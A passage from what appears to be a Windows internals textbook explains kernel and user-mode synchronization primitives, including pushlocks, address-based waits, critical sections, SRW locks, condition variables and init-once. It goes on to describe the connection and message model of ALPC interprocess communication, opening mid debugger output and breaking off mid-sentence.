ffffde07a894fa20: (0006,0478) Flags: 00000884 Mdl:
00000000
Not impersonating
DeviceMap ffff8786fce35840
Owning Process ffffde07a7f990c0 Image:
svchost.exe
Attached Process N/A Image:
N/A
Wait Start TickCount 3649 Ticks: 0
Context Switch Count 31
IdealProcessor: 1
UserTime 00:00:00.015
KernelTime 00:00:00.000
Win32 Start Address 0x00007ff926812390
Stack Init ffff8287943aa650 Current ffff8287943a8030
Base ffff8287943ab000 Limit ffff8287943a4000 Call
0000000000000000
Priority 7 BasePriority 6 PriorityDecrement 0
IoPriority 0 PagePriority 1
Child-SP RetAddr Call Site
ffff8287`943a8070 fffff801`104a423a
nt!KiSwapContext+0x76
ffff8287`943a81b0 fffff801`104a5d53
nt!KiSwapThread+0x5ba
ffff8287`943a8270 fffff801`104a6579
nt!KiCommitThreadWait+0x153
ffff8287`943a8310 fffff801`1263e962
nt!KeWaitForSingleObject+0x239
ffff8287`943a8400 fffff801`1263d682
Ntfs!NtfsNonCachedIo+0xa52
ffff8287`943a86b0 fffff801`1263b756
Ntfs!NtfsCommonRead+0x1d52
ffff8287`943a8850 fffff801`1049a725
Ntfs!NtfsFsdRead+0x396
ffff8287`943a8920 fffff801`11826591
nt!IofCallDriver+0x55
Pushlocks
Pushlocks are another optimized synchronization mechanism built on event
objects; like fast and guarded mutexes, they wait for an event only when
there’s contention on the lock. They offer advantages over them, however, in
that they can also be acquired in shared or exclusive mode, just like an
executive resource. Unlike the latter, however, they provide an additional
advantage due to their size: a resource object is 104 bytes, but a pushlock is
pointer sized. Because of this, pushlocks do not require allocation nor
initialization and are guaranteed to work in low-memory conditions. Many
components inside of the kernel moved away from executive resources to
pushlocks, and modern third-party drivers all use pushlocks as well.
There are four types of pushlocks: normal, cache-aware, auto-expand, and
address-based. Normal pushlocks require only the size of a pointer in storage
(4 bytes on 32-bit systems, and 8 bytes on 64-bit systems). When a thread
acquires a normal pushlock, the pushlock code marks the pushlock as owned
if it is not currently owned. If the pushlock is owned exclusively or the thread
wants to acquire the thread exclusively and the pushlock is owned on a
shared basis, the thread allocates a wait block on the thread’s stack, initializes
an event object in the wait block, and adds the wait block to the wait list
associated with the pushlock. When a thread releases a pushlock, the thread
wakes a waiter, if any are present, by signaling the event in the waiter’s wait
block.
Because a pushlock is only pointer-sized, it actually contains a variety of
bits to describe its state. The meaning of those bits changes as the pushlock
changes from being contended to noncontended. In its initial state, the
pushlock contains the following structure:
■ One lock bit, set to 1 if the lock is acquired
■ One waiting bit, set to 1 if the lock is contended and someone is
waiting on it
■ One waking bit, set to 1 if the lock is being granted to a thread and the
waiter’s list needs to be optimized
■ One multiple shared bit, set to 1 if the pushlock is shared and
currently acquired by more than one thread
■ 28 (on 32-bit Windows) or 60 (on 64-bit Windows) share count bits,
containing the number of threads that have acquired the pushlock
As discussed previously, when a thread acquires a pushlock exclusively
while the pushlock is already acquired by either multiple readers or a writer,
the kernel allocates a pushlock wait block. The structure of the pushlock
value itself changes. The share count bits now become the pointer to the wait
block. Because this wait block is allocated on the stack, and the header files
contain a special alignment directive to force it to be 16-byte aligned, the
bottom 4 bits of any pushlock wait-block structure will be all zeros.
Therefore, those bits are ignored for the purposes of pointer dereferencing;
instead, the 4 bits shown earlier are combined with the pointer value.
Because this alignment removes the share count bits, the share count is now
stored in the wait block instead.
A cache-aware pushlock adds layers to the normal (basic) pushlock by
allocating a pushlock for each processor in the system and associating it with
the cache-aware pushlock. When a thread wants to acquire a cache-aware
pushlock for shared access, it simply acquires the pushlock allocated for its
current processor in shared mode; to acquire a cache-aware pushlock
exclusively, the thread acquires the pushlock for each processor in exclusive
mode.
As you can imagine, however, with Windows now supporting systems of
up to 2560 processors, the number of potential cache-padded slots in the
cache-aware pushlock would require immense fixed allocations, even on
systems with few processors. Support for dynamic hot-add of processors
makes the problem even harder because it would technically require the
preallocation of all 2560 slots ahead of time, creating multi-KB lock
structures. To solve this, modern versions of Windows also implement the
auto-expand push lock. As the name suggests, this type of cache-aware
pushlock can dynamically grow the number of cache slots as needed, both
based on contention and processor count, while guaranteeing forward
progress, leveraging the executive’s slot allocator, which pre-reserves paged
or nonpaged pool (depending on flags that were passed in when allocating
the auto-expand pushlock).
Unfortunately for third-party developers, cache-aware (and their newer
cousins, auto-expand) pushlocks are not officially documented for use,
although certain data structures, such as FCB Headers in Windows 10 21H1
and later, do opaquely use them (more information about the FCB structure is
available in Chapter 11.) Internal parts of the kernel in which auto-expand
pushlocks are used include the memory manager, where they are used to
protect Address Windowing Extension (AWE) data structures.
Finally, another kind of nondocumented, but exported, push-lock is the
address-based pushlock, which rounds out the implementation with a
mechanism similar to the address-based wait we’ll shortly see in user mode.
Other than being a different “kind” of pushlock, the address-based pushlock
refers more to the interface behind its usage. On one end, a caller uses
ExBlockOnAddressPushLock, passing in a pushlock, the virtual address of
some variable of interest, the size of the variable (up to 8 bytes), and a
comparison address containing the expected, or desired, value of the variable.
If the variable does not currently have the expected value, a wait is initialized
with ExTimedWaitForUnblockPushLock. This behaves similarly to
contended pushlock acquisition, with the difference that a timeout value can
be specified. On the other end, a caller uses
ExUnblockOnAddressPushLockEx after making a change to an address that
is being monitored to signal a waiter that the value has changed. This
technique is especially useful when dealing with changes to data protected by
a lock or interlocked operation, so that racing readers can wait for the
writer’s notification that their change is complete, outside of a lock. Other
than a much smaller memory footprint, one of the large advantages that
pushlocks have over executive resources is that in the noncontended case
they do not require lengthy accounting and integer operations to perform
acquisition or release. By being as small as a pointer, the kernel can use
atomic CPU instructions to perform these tasks. (For example, on x86 and
x64 processors, lock cmpxchg is used, which atomically compares and
exchanges the old lock with a new lock.) If the atomic compare and exchange
fails, the lock contains values the caller did not expect (callers usually expect
the lock to be unused or acquired as shared), and a call is then made to the
more complex contended version.
To improve performance even further, the kernel exposes the pushlock
functionality as inline functions, meaning that no function calls are ever
generated during noncontended acquisition—the assembly code is directly
inserted in each function. This increases code size slightly, but it avoids the
slowness of a function call. Finally, pushlocks use several algorithmic tricks
to avoid lock convoys (a situation that can occur when multiple threads of the
same priority are all waiting on a lock and little actual work gets done), and
they are also self-optimizing: the list of threads waiting on a pushlock will be
periodically rearranged to provide fairer behavior when the pushlock is
released.
One more performance optimization that is applicable to pushlock
acquisition (including for address-based pushlocks) is the opportunistic
spinlock-like behavior during contention, before performing the dispatcher
object wait on the pushlock wait block’s event. If the system has at least one
other unparked processor (see Chapter 4 of Part 1 for more information on
core parking), the kernel enters a tight spin-based loop for
ExpSpinCycleCount cycles just like a spinlock would, but without raising the
IRQL, issuing a yield instruction (such as a pause on x86/x64) for each
iteration. If during any of the iterations, the pushlock now appears to be
released, an interlocked operation to acquire the pushlock is performed.
If the spin cycle times out, or the interlocked operation failed (due to a
race), or if the system does not have at least one additional unparked
processor, then KeWaitForSingleObject is used on the event object in the
pushlock wait block. ExpSpinCycleCount is set to 10240 cycles on any
machine with more than one logical processor and is not configurable. For
systems with an AMD processor that implements the MWAITT (MWAIT
Timer) specification, the monitorx and mwaitx instructions are used instead
of a spin loop. This hardware-based feature enables waiting, at the CPU
level, for the value at an address to change without having to enter a loop, but
they allow providing a timeout value so that the wait is not indefinite (which
the kernel supplies based on ExpSpinCycleCount).
On a final note, with the introduction of the AutoBoost feature (explained
in Chapter 4 of Part 1), pushlocks also leverage its capabilities by default,
unless callers use the newer ExXxxPushLockXxxEx, functions, which allow
passing in the EX_PUSH_LOCK_FLAG_DISABLE_AUTOBOOST flag that
disables the functionality (which is not officially documented). By default,
the non-Ex functions now call the newer Ex functions, but without supplying
the flag.
Address-based waits
Based on the lessons learned with keyed events, the key synchronization
primitive that the Windows kernel now exposes to user mode is the alert-by-
ID system call (and its counterpart to wait-on-alert-by-ID). With these two
simple system calls, which require no memory allocations or handles, any
number of process-local synchronizations can be built, which will include the
addressed-based waiting mechanism we’re about to see, on top of which
other primitives, such as critical sections and SRW locks, are based upon.
Address-based waiting is based on three documented Win32 API calls:
WaitOnAddress, WakeByAddressSingle, and WakeByAddressAll. These
functions in KernelBase.dll are nothing more than forwarders into Ntdll.dll,
where the real implementations are present under similar names beginning
with Rtl, standing for Run Time Library. The Wait API takes in an address
pointing to a value of interest, the size of the value (up to 8 bytes), and the
address of the undesired value, plus a timeout. The Wake APIs take in the
address only.
First, RtlWaitOnAddress builds a local address wait block tracking the
thread ID and address and inserts it into a per-process hash table located in
the Process Environment Block (PEB). This mirrors the work done by
ExBlockOnAddressPushLock as we saw earlier, except that a hash table
wasn’t needed because the caller had to store a push lock pointer somewhere.
Next, just like the kernel API, RtlWaitOnAddress checks whether the target
address already has a value different than the undesirable one and, if so,
removes the address wait block, returning FALSE. Otherwise, it will call an
internal function to block.
If there is more than one unparked processor available, the blocking
function will first attempt to avoid entering the kernel by spinning in user
mode on the value of the address wait block bit indicating availability, based
on the value of RtlpWaitOnAddressSpinCount, which is hardcoded to 1024 as
long as the system has more than one processor. If the wait block still
indicates contention, a system call is now made to the kernel using
NtWaitForAlertByThreadId, passing in the address as the hint parameter, as
well as the timeout.
If the function returns due to a timeout, a flag is set in the address wait
block to indicate this, and the block is removed, with the function returning
STATUS_TIMEOUT. However, there is a subtle race condition where the
caller may have called the Wake function just a few cycles after the wait has
timed out. Because the wait block flag is modified with a compare-exchange
instruction, the code can detect this and actually calls
NtWaitForAlertByThreadId a second time, this time without a timeout. This
is guaranteed to return because the code knows that a wake is in progress.
Note that in nontimeout cases, there’s no need to remove the wait block,
because the waker has already done so.
On the writer’s side, both RtlWakeOnAddressSingle and
RtlWakeOnAddressAll leverage the same helper function, which hashes the
input address and looks it up in the PEB’s hash table introduced earlier in this
section. Carefully synchronizing with compare-exchange instructions, it
removes the address wait block from the hash table, and, if committed to
wake up any waiters, it iterates over all matching wait blocks for the same
address, calling NtAlertThreadByThreadId for each of them, in the All usage
of the API, or only the first one, in the Single version of the API.
With this implementation, we essentially now have a user-mode
implementation of keyed events that does not rely on any kernel object or
handle, not even a single global one, completely removing any failures in
low-resource conditions. The only thing the kernel is responsible for is
putting the thread in a wait state or waking up the thread from that wait state.
The next few sections cover various primitives that leverage this
functionality to provide synchronization during contention.
Critical sections
Critical sections are one of the main synchronization primitives that
Windows provides to user-mode application developers on top of the kernel-
based synchronization primitives. Critical sections and the other user-mode
primitives you’ll see later have one major advantage over their kernel
counterparts, which is saving a round trip to kernel mode in cases in which
the lock is noncontended (which is typically 99 percent of the time or more).
Contended cases still require calling the kernel, however, because it is the
only piece of the system that can perform the complex waking and
dispatching logic required to make these objects work.
Critical sections can remain in user mode by using a local bit to provide
the main exclusive locking logic, much like a pushlock. If the bit is 0, the
critical section can be acquired, and the owner sets the bit to 1. This
operation doesn’t require calling the kernel but uses the interlocked CPU
operations discussed earlier. Releasing the critical section behaves similarly,
with bit state changing from 1 to 0 with an interlocked operation. On the
other hand, as you can probably guess, when the bit is already 1 and another
caller attempts to acquire the critical section, the kernel must be called to put
the thread in a wait state.
Akin to pushlocks and address-based waits, critical sections implement a
further optimization to avoid entering the kernel: spinning, much like a
spinlock (albeit at IRQL 0—Passive Level) on the lock bit, hoping it clears
up quickly enough to avoid the blocking wait. By default, this is set to 2000
cycles, but it can be configured differently by using the
InitializeCriticalSectionEx or InitializeCriticalSectionAndSpinCount API at
creation time, or later, by calling SetCriticalSectionSpinCount.
Note
As we discussed, because WaitForAddressSingle already implements a
busy spin wait as an optimization, with a default 1024 cycles, technically
there are 3024 cycles spent spinning by default—first on the critical
sections’ lock bit and then on the wait address block’s lock bit, before
actually entering the kernel.
When they do need to enter the true contention path, critical sections will,
the first time they’re called, attempt to initialize their LockSemaphore field.
On modern versions of Windows, this is only done if
RtlpForceCSToUseEvents is set, which is the case if the
KACF_ALLOCDEBUGINFOFORCRITSECTIONS (0x400000) flag is set
through the Application Compatibility Database on the current process. If the
flag is set, however, the underlying dispatcher event object will be created
(even if the field refers to semaphore, the object is an event). Then, assuming
that the event was created, a call to WaitForSingleObject is performed to
block on the critical section (typically with a per-process configurable
timeout value, to aid in the debugging of deadlocks, after which the wait is
reattempted).
In cases where the application compatibility shim was not requested, or in
extreme low-memory conditions where the shim was requested but the event
could not be created, critical sections no longer use the event (nor any of the
keyed event functionality described earlier). Instead, they directly leverage
the address-based wait mechanism described earlier (also with the same
deadlock detection timeout mechanism from the previous paragraph). The
address of the local bit is supplied to the call to WaitOnAddress, and as soon
as the critical section is released by LeaveCriticalSection, it either calls
SetEvent on the event object or WakeAddressSingle on the local bit.
Note
Even though we’ve been referring to APIs by their Win32 name, in
reality, critical sections are implemented by Ntdll.dll, and KernelBase.dll
merely forwards the functions to identical functions starting with Rtl
instead, as they are part of the Run Time Library. Therefore,
RtlLeaveCriticalSection calls NtSetEvent. RtlWakeAddressSingle, and so
on.
Finally, because critical sections are not kernel objects, they have certain
limitations. The primary one is that you cannot obtain a kernel handle to a
critical section; as such, no security, naming, or other Object Manager
functionality can be applied to a critical section. Two processes cannot use
the same critical section to coordinate their operations, nor can duplication or
inheritance be used.
User-mode resources
User-mode resources also provide more fine-grained locking mechanisms
than kernel primitives. A resource can be acquired for shared mode or for
exclusive mode, allowing it to function as a multiple-reader (shared), single-
writer (exclusive) lock for data structures such as databases. When a resource
is acquired in shared mode and other threads attempt to acquire the same
resource, no trip to the kernel is required because none of the threads will be
waiting. Only when a thread attempts to acquire the resource for exclusive
access, or the resource is already locked by an exclusive owner, is this
required.
To make use of the same dispatching and synchronization mechanism you
saw in the kernel, resources make use of existing kernel primitives. A
resource data structure (RTL_RESOURCE) contains handles to two kernel
semaphore objects. When the resource is acquired exclusively by more than
one thread, the resource releases the exclusive semaphore with a single
release count because it permits only one owner. When the resource is
acquired in shared mode by more than one thread, the resource releases the
shared semaphore with as many release counts as the number of shared
owners. This level of detail is typically hidden from the programmer, and
these internal objects should never be used directly.
Resources were originally implemented to support the SAM (or Security
Account Manager, which is discussed in Chapter 7 of Part 1) and not exposed
through the Windows API for standard applications. Slim Reader-Writer
Locks (SRW Locks), described shortly, were later implemented to expose a
similar but highly optimized locking primitive through a documented API,
although some system components still use the resource mechanism.
Condition variables
Condition variables provide a Windows native implementation for
synchronizing a set of threads that are waiting on a specific result to a
conditional test. Although this operation was possible with other user-mode
synchronization methods, there was no atomic mechanism to check the result
of the conditional test and to begin waiting on a change in the result. This
required that additional synchronization be used around such pieces of code.
A user-mode thread initializes a condition variable by calling
InitializeConditionVariable to set up the initial state. When it wants to
initiate a wait on the variable, it can call SleepConditionVariableCS, which
uses a critical section (that the thread must have initialized) to wait for
changes to the variable, or, even better, SleepConditionVariableSRW, which
instead uses a Slim Reader/Writer (SRW) lock, which we describe next,
giving the caller the advantage to do a shared (reader) of exclusive (writer)
acquisition.
Meanwhile, the setting thread must use WakeConditionVariable (or
WakeAllConditionVariable) after it has modified the variable. This call
releases the critical section or SRW lock of either one or all waiting threads,
depending on which function was used. If this sounds like address-based
waiting, it’s because it is—with the additional guarantee of the atomic
compare-and-wait operation. Additionally, condition variables were
implemented before address-based waiting (and thus, before alert-by-ID) and
had to rely on keyed events instead, which were only a close approximation
of the desired behavior.
Before condition variables, it was common to use either a notification
event or a synchronization event (recall that these are referred to as auto-reset
or manual-reset in the Windows API) to signal the change to a variable, such
as the state of a worker queue. Waiting for a change required a critical
section to be acquired and then released, followed by a wait on an event.
After the wait, the critical section had to be reacquired. During this series of
acquisitions and releases, the thread might have switched contexts, causing
problems if one of the threads called PulseEvent (a similar problem to the
one that keyed events solve by forcing a wait for the signaling thread if there
is no waiter). With condition variables, acquisition of the critical section or
SRW lock can be maintained by the application while
SleepConditionVariableCS/SRW is called and can be released only after the
actual work is done. This makes writing work-queue code (and similar
implementations) much simpler and predictable.
With both SRW locks and critical sections moving to the address-based
wait primitives, however, conditional variables can now directly leverage
NtWaitForAlertByThreadId and directly signal the thread, while building a
conditional variable wait block that’s structurally similar to the address wait
block we described earlier. The need for keyed events is thus completely
elided, and they remain only for backward compatibility.
Slim Reader/Writer (SRW) locks
Although condition variables are a synchronization mechanism, they are not
fully primitive locks because they do implicit value comparisons around their
locking behavior and rely on higher-level abstractions to be provided
(namely, a lock!). Meanwhile, address-based waiting is a primitive operation,
but it provides only the basic synchronization primitive, not true locking. In
between these two worlds, Windows has a true locking primitive, which is
nearly identical to a pushlock: the Slim Reader/Writer lock (SRW lock).
Like their kernel counterparts, SRW locks are also pointer sized, use atomic
operations for acquisition and release, rearrange their waiter lists, protect
against lock convoys, and can be acquired both in shared and exclusive
mode. Just like pushlocks, SRW locks can be upgraded, or converted, from
shared to exclusive and vice versa, and they have the same restrictions around
recursive acquisition. The only real difference is that SRW locks are
exclusive to user-mode code, whereas pushlocks are exclusive to kernel-
mode code, and the two cannot be shared or exposed from one layer to the
other. Because SRW locks also use the NtWaitForAlertByThreadId primitive,
they require no memory allocation and are guaranteed never to fail (other
than through incorrect usage).
Not only can SRW locks entirely replace critical sections in application
code, which reduces the need to allocate the large CRITICAL_SECTION
structure (and which previously required the creation of an event object), but
they also offer multiple-reader, single-writer functionality. SRW locks must
first be initialized with InitializeSRWLock or can be statically initialized with
a sentinel value, after which they can be acquired or released in either
exclusive or shared mode with the appropriate APIs:
AcquireSRWLockExclusive, ReleaseSRWLockExclusive,
AcquireSRWLockShared, and ReleaseSRWLockShared. APIs also exist for
opportunistically trying to acquire the lock, guaranteeing that no blocking
operation will occur, as well as converting the lock from one mode to
another.
Note
Unlike most other Windows APIs, the SRW locking functions do not
return with a value—instead, they generate exceptions if the lock could
not be acquired. This makes it obvious that an acquisition has failed so
that code that assumes success will terminate instead of potentially
proceeding to corrupt user data. Since SRW locks do not fail due to
resource exhaustion, the only such exception possible is
STATUS_RESOURCE_NOT_OWNED in the case that a nonshared SRW
lock is incorrectly being released in shared mode.
The Windows SRW locks do not prefer readers or writers, meaning that
the performance for either case should be the same. This makes them great
replacements for critical sections, which are writer-only or exclusive
synchronization mechanisms, and they provide an optimized alternative to
resources. If SRW locks were optimized for readers, they would be poor
exclusive-only locks, but this isn’t the case. This is why we earlier mentioned
that conditional variables can also use SRW locks through the
SleepConditionVariableSRW API. That being said, since keyed events are no
longer used in one mechanism (SRW) but are still used in the other (CS),
address-based waiting has muted most benefits other than code size—and the
ability to have shared versus exclusive locking. Nevertheless, code targeting
older versions of Windows should use SRW locks to guarantee the increased
benefits are there on kernels that still used keyed events.
Run once initialization
The ability to guarantee the atomic execution of a piece of code responsible
for performing some sort of initialization task—such as allocating memory,
initializing certain variables, or even creating objects on demand—is a typical
problem in multithreaded programming. In a piece of code that can be called
simultaneously by multiple threads (a good example is the DllMain routine,
which initializes a DLL), there are several ways of attempting to ensure the
correct, atomic, and unique execution of initialization tasks.
For this scenario, Windows implements init once, or one-time initialization
(also called run once initialization internally). The API exists both as a
Win32 variant, which calls into Ntdll.dll’s Run Time Library (Rtl) as all the
other previously seen mechanisms do, as well as the documented Rtl set of
APIs, which are exposed to kernel programmers in Ntoskrnl.exe instead
(obviously, user-mode developers could bypass Win32 and use the Rtl
functions in Ntdll.dll too, but that is never recommended). The only
difference between the two implementations is that the kernel ends up using
an event object for synchronization, whereas user mode uses a keyed event
instead (in fact, it passes in a NULL handle to use the low-memory keyed
event that was previously used by critical sections).
Note
Since recent versions of Windows now implement an address-based
pushlock in kernel mode, as well as the address-based wait primitive in
user mode, the Rtl library could probably be updated to use
RtlWakeAddressSingle and ExBlockOnAddressPushLock, and in fact a
future version of Windows could always do that—the keyed event merely
provided a more similar interface to a dispatcher event object in older
Windows versions. As always, do not rely on the internal details
presented in this book, as they are subject to change.
The init once mechanism allows for both synchronous (meaning that the
other threads must wait for initialization to complete) execution of a certain
piece of code, as well as asynchronous (meaning that the other threads can
attempt to do their own initialization and race) execution. We look at the
logic behind asynchronous execution after explaining the synchronous
mechanism.
In the synchronous case, the developer writes the piece of code that would
normally execute after double-checking the global variable in a dedicated
function. Any information that this routine needs can be passed through the
parameter variable that the init once routine accepts. Any output information
is returned through the context variable. (The status of the initialization itself
is returned as a Boolean.) All the developer has to do to ensure proper
execution is call InitOnceExecuteOnce with the parameter, context, and run-
once function pointer after initializing an INIT_ONCE object with
InitOnceInitialize API. The system takes care of the rest.
For applications that want to use the asynchronous model instead, the
threads call InitOnceBeginInitialize and receive a BOOLEAN pending status
and the context described earlier. If the pending status is FALSE,
initialization has already taken place, and the thread uses the context value
for the result. (It’s also possible for the function to return FALSE, meaning
that initialization failed.) However, if the pending status comes back as
TRUE, the thread should race to be the first to create the object. The code
that follows performs whatever initialization tasks are required, such as
creating objects or allocating memory. When this work is done, the thread
calls InitOnceComplete with the result of the work as the context and
receives a BOOLEAN status. If the status is TRUE, the thread won the race,
and the object that it created or allocated is the one that will be the global
object. The thread can now save this object or return it to a caller, depending
on the usage.
In the more complex scenario when the status is FALSE, this means that
the thread lost the race. The thread must undo all the work it did, such as
deleting objects or freeing memory, and then call InitOnceBeginInitialize
again. However, instead of requesting to start a race as it did initially, it uses
the INIT_ONCE_CHECK_ONLY flag, knowing that it has lost, and requests
the winner’s context instead (for example, the objects or memory that were
created or allocated by the winner). This returns another status, which can be
TRUE, meaning that the context is valid and should be used or returned to
the caller, or FALSE, meaning that initialization failed and nobody has been
able to perform the work (such as in the case of a low-memory condition,
perhaps).
In both cases, the mechanism for run-once initialization is similar to the
mechanism for condition variables and SRW locks. The init once structure is
pointer-size, and inline assembly versions of the SRW acquisition/release
code are used for the noncontended case, whereas keyed events are used
when contention has occurred (which happens when the mechanism is used
in synchronous mode) and the other threads must wait for initialization. In
the asynchronous case, the locks are used in shared mode, so multiple threads
can perform initialization at the same time. Although not as highly efficient
as the alert-by-ID primitive, the usage of a keyed event still guarantees that
the init once mechanism will function even in most cases of memory
exhaustion.
Advanced local procedure call
All modern operating systems require a mechanism for securely and
efficiently transferring data between one or more processes in user mode, as
well as between a service in the kernel and clients in user mode. Typically,
UNIX mechanisms such as mailslots, files, named pipes, and sockets are used
for portability, whereas in other cases, developers can use OS-specific
functionality, such as the ubiquitous window messages used in Win32
graphical applications. In addition, Windows also implements an internal IPC
mechanism called Advanced (or Asynchronous) Local Procedure Call, or
ALPC, which is a high-speed, scalable, and secured facility for message
passing arbitrary-size messages.
Note
ALPC is the replacement for an older IPC mechanism initially shipped
with the very first kernel design of Windows NT, called LPC, which is
why certain variables, fields, and functions might still refer to “LPC”
today. Keep in mind that LPC is now emulated on top of ALPC for
compatibility and has been removed from the kernel (legacy system calls
still exist, which get wrapped into ALPC calls).
Although it is internal, and thus not available for third-party developers,
ALPC is widely used in various parts of Windows:
■ Windows applications that use remote procedure call (RPC), a
documented API, indirectly use ALPC when they specify local-RPC
over the ncalrpc transport, a form of RPC used to communicate
between processes on the same system. This is now the default
transport for almost all RPC clients. In addition, when Windows
drivers leverage kernel-mode RPC, this implicitly uses ALPC as well
as the only transport permitted.
■ Whenever a Windows process and/or thread starts, as well as during
any Windows subsystem operation, ALPC is used to communicate
with the subsystem process (CSRSS). All subsystems communicate
with the session manager (SMSS) over ALPC.
■ When a Windows process raises an exception, the kernel’s exception
dispatcher communicates with the Windows Error Reporting (WER)
Service by using ALPC. Processes also can communicate with WER
on their own, such as from the unhandled exception handler. (WER is
discussed later in Chapter 10.)
■ Winlogon uses ALPC to communicate with the local security
authentication process, LSASS.
■ The security reference monitor (an executive component explained in
Chapter 7 of Part 1) uses ALPC to communicate with the LSASS
process.
■ The user-mode power manager and power monitor communicate with
the kernel-mode power manager over ALPC, such as whenever the
LCD brightness is changed.
■ The User-Mode Driver Framework (UMDF) enables user-mode
drivers to communicate with the kernel-mode reflector driver by using
ALPC.
■ The new Core Messaging mechanism used by CoreUI and modern
UWP UI components use ALPC to both register with the Core
Messaging Registrar, as well as to send serialized message objects,
which replace the legacy Win32 window message model.
■ The Isolated LSASS process, when Credential Guard is enabled,
communicates with LSASS by using ALPC. Similarly, the Secure
Kernel transmits trustlet crash dump information through ALPC to
WER.
■ As you can see from these examples, ALPC communication crosses
all possible types of security boundaries—from unprivileged
applications to the kernel, from VTL 1 trustlets to VTL 0 services,
and everything in between. Therefore, security and performance were
critical requirements in its design.
Connection model
Typically, ALPC messages are used between a server process and one or
more client processes of that server. An ALPC connection can be established
between two or more user-mode processes or between a kernel-mode
component and one or more user-mode processes, or even between two
kernel-mode components (albeit this would not be the most efficient way of
communicating). ALPC exposes a single executive object called the port
object to maintain the state needed for communication. Although this is just
one object, there are several kinds of ALPC ports that it can represent:
■ Server connection port A named port that is a server connection
request point. Clients can connect to the server by connecting to this
port.
■ Server communication port An unnamed port a server uses to
communicate with one of its clients. The server has one such port per
active client.
■ Client communication port An unnamed port each client uses to
communicate with its server.
■ Unconnected communication port An unnamed port a client can use
to communicate locally with itself. This model was abolished in the
move from LPC to ALPC but is emulated for Legacy LPC for
compatibility reasons.
ALPC follows a connection and communication model that’s somewhat
reminiscent of BSD socket programming. A server first creates a server
connection port (NtAlpcCreatePort), whereas a client attempts to connect to
it (NtAlpcConnectPort). If the server was in a listening state (by using
NtAlpcSendWaitReceivePort), it receives a connection request message and
can choose to accept it (NtAlpcAcceptConnectPort). In doing so, both the
client and server communication ports are created, and each respective
endpoint process receives a handle to its communication port. Messages are
then sent across this handle (still by using NtAlpcSendWaitReceivePort),
which the server continues to receive by using the same API. Therefore, in
the simplest scenario, a single server thread sits in a loop calling
NtAlpcSendWaitReceivePort and receives with connection requests, which it
accepts, or messages, which it handles and potentially responds to. The
server can differentiate between messages by reading the PORT_HEADER
structure, which sits on top of every message and contains a message type.
The various message types are shown in Table 8-30.
Table 8-30 ALPC message types
Type
Meaning
LPC_R
EQUE
ST
A normal ALPC message, with a potential synchronous reply
LPC_R
EPLY
An ALPC message datagram, sent as an asynchronous reply
to a previous datagram
LPC_
DATA
GRAM
An ALPC message datagram, which is immediately released
and cannot be synchronously replied to
LPC_L
OST_R
EPLY
Deprecated, used by Legacy LPC Reply API
LPC_P
ORT_
CLOS
ED
Sent whenever the last handle of an ALPC port is closed,
notifying clients and servers that the other side is gone
LPC_C
LIENT
_DIED
Sent by the process manager (PspExitThread) using Legacy
LPC to the registered termination port(s) of the thread and the
registered exception port of the process
LPC_E
XCEP
TION
Sent by the User-Mode Debugging Framework
(DbgkForwardException) to the exception port through
Legacy LPC
LPC_
DEBU
G_EV
ENT
Deprecated, used by the legacy user-mode debugging services
when these were part of the Windows subsystem
LPC_E
RROR
_EVEN
T
Sent whenever a hard error is generated from user-mode
(NtRaiseHardError) and sent using Legacy LPC to exception
port of the target thread, if any, otherwise to the error port,
typically owned by CSRSS
LPC_C
ONNE
CTION
_REQ
UEST
An ALPC message that represents an attempt by a client to
connect to the server’s connection port
LPC_C
ONNE
CTION
_REPL
Y
The internal message that is sent by a server when it calls
NtAlpcAcceptConnectPort to accept a client’s connection
request
LPC_C
ANCE
LED
The received reply by a client or server that was waiting for a
message that has now been canceled
LPC_
UNRE
GISTE
R_PR
OCESS
Sent by the process manager when the exception port for the
current process is swapped to a different one, allowing the
owner (typically CSRSS) to unregister its data structures for
the thread switching its port to a different one
The server can also deny the connection, either for security reasons or
simply due to protocol or versioning issues. Because clients can send a
custom payload with a connection request, this is usually used by various
services to ensure that the correct client, or only one client, is talking to the
server. If any anomalies are found, the server can reject the connection and,
optionally, return a payload containing information on why the client was
rejected (allowing the client to take corrective action, if possible, or for
debugging purposes).
Once a connection is made, a connection information structure (actually, a
blob, as we describe shortly) stores the linkage between all the different
ports, as shown in Figure 8-40.
Figure 8-40 Use of ALPC ports.
Message model
Using ALPC, a client and thread using blocking messages each take turns
performing a loop around the NtAlpcSendWaitReceivePort system call, in
which one side sends a request and waits for a reply while the other side does
the opposite. However, because ALPC supports asynchronous messages, it’s
possible for either side not to block and choose instead to perform some other
runtime task and check for messages later (some of these methods will be
described shortly). ALPC supports the following three methods of
exchanging payloads sent with a message:
■ A message can be sent to another process through the standard
double-buffering mechanism, in which the kernel maintains a copy of
the message (copying it from the source process), switches to the
target process, and copies the data from the kernel’s buffer. For
compatibility, if legacy LPC is being used, only messages of up to
256 bytes can be sent this way, whereas ALPC can allocate an
extension buffer for messages up to 64 KB.
■ A message can be stored in an ALPC section object from which the
client and server processes map views. (See Chapter 5 in Part 1 for
more information on section mappings.)
An important side effect of the ability to send asynchronous messages is
that a message can be canceled—for example, when a request takes too long
or if the user has indicated that they want to cancel the operation it
implements. ALPC supports this with the NtAlpcCancelMessage system call.
An ALPC message can be on one of five different queues implemented by
the ALPC port object:
■ Main queue A message has been sent, and the client is processing it.
■ Pending queue A message has been sent and the caller is waiting for
a reply, but the reply has not yet been sent.
■ Large message queue A message has been sent, but the caller’s
buffer was too small to receive it. The caller gets another chance to
allocate a larger buffer and request the message payload again.
■ Canceled queue A message that was sent to the port but has since
been canceled.
■ Direct queue A message that was sent with a direct event attached.
Note that a sixth queue, called the wait queue, does not link messages
together; instead, it links all the threads waiting on a message.
EXPERIMENT: Viewing subsystem ALPC port
objects
You can see named ALPC port objects with the WinObj tool from
Sysinternals or WinObjEx64 from GitHub. Run one of the two
tools elevated as Administrator and select the root directory. A gear
icon identifies the port objects in WinObj, and a power plug in
WinObjEx64, as shown here (you can also click on the Type field
to easily sort all the objects by their type):
You should see the ALPC ports used by the power manager, the
security manager, and other internal Windows services. If you want
to see the ALPC port objects used by RPC, you can select the \RPC
Control directory. One of the primary users of ALPC, outside of
Local RPC, is the Windows subsystem, which uses ALPC to
communicate with the Windows subsystem DLLs that are present
in all Windows processes. Because CSRSS loads once for each
session, you will find its ALPC port objects under the appropriate
\Sessions\X\Windows directory, as shown here:
Asynchronous operation
The synchronous model of ALPC is tied to the original LPC architecture in
the early NT design and is similar to other blocking IPC mechanisms, such as
Mach ports. Although it is simple to design, a blocking IPC algorithm
includes many possibilities for deadlock, and working around those scenarios
creates complex code that requires support for a more flexible asynchronous
